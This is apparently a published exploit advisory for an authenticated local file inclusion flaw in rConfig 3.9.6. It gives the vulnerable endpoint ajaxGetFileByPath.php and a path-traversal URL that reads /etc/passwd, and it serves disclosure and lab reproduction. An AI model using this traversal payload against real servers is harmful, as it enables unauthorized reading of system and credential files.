24 lines
No EOL
1.2 KiB
Text
24 lines
No EOL
1.2 KiB
Text
# Exploit Title: rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated)
|
|
# Date: 2021-03-12
|
|
# Exploit Author: 5a65726f
|
|
# Vendor Homepage: https://www.rconfig.com
|
|
# Software Link: https://www.rconfig.com/downloads/rconfig-3.9.6.zip
|
|
# Version: rConfig v3.9.6
|
|
# Install scripts :
|
|
# https://www.rconfig.com/downloads/scripts/install_rConfig.sh
|
|
# https://www.rconfig.com/downloads/scripts/centos7_install.sh
|
|
# https://www.rconfig.com/downloads/scripts/centos6_install.sh
|
|
# Tested on: centOS 7
|
|
# Notes : If you want to reproduce in your lab environment follow those links :
|
|
# http://help.rconfig.com/gettingstarted/installation
|
|
# then
|
|
# http://help.rconfig.com/gettingstarted/postinstall
|
|
|
|
# Description:
|
|
rConfig, the open source network device configuration management tool, is vulnerable to local file inclusion in /lib/ajaxHandlers/ajaxGetFileByPath.php with parameter path. ajaxGetFileByPath.php allows authenticated users to download any file on the server.
|
|
|
|
The following steps can be carried out in duplicating this vulnerability.
|
|
|
|
- Login the rConfig application with your credentials.
|
|
- Enter the following link to your browser:
|
|
http(s)://<SERVER>/lib/ajaxHandlers/ajaxGetFileByPath.php?path=../../../../../../etc/passwd |